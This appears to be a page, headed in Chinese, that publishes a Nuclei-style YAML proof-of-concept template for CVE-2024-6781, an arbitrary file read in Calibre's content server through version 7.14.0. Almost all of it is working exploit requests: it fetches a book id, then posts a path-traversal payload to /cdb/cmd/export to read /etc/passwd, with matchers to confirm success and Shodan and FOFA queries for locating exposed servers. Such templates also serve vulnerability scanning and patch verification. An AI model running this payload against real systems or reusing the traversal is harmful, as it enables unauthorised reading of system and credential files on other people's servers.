漏洞描述
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
CVE-2024-6781: Calibre <= 7.14.0 Arbitrary File Read
PoC代码[已公开]
id: CVE-2024-6781
info:
name: Calibre <= 7.14.0 Arbitrary File Read
author: DhiyaneshDK
severity: high
description: |
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
reference:
- https://starlabs.sg/advisories/24/24-6781/
classification:
epss-score: 0.93625
epss-percentile: 0.99828
cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: calibre-ebook
product: calibre
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-request: 2
tags: cve,cve2024,calibre,lfi,vuln
http:
- raw:
- |
GET /interface-data/books-init HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: book_ids
internal: true
json:
- '.search_result.book_ids[0]'
- raw:
- |
POST /cdb/cmd/export HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
matchers-condition: and
matchers:
- type: word
part: content_type
words:
- "application/json"
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- '"result":'
condition: and
- type: status
status:
- 200
# digest: 490a004630440220443128ff052972f9326b9f8eb0b6c425a1020b7c9d18674e3dadfd3450c67df1022048bd5af0cc76023f434d845c187a9e8911755cf26c84e256fa1f2fc06f8825a6:922c64590222798bb761d5b6d8e72950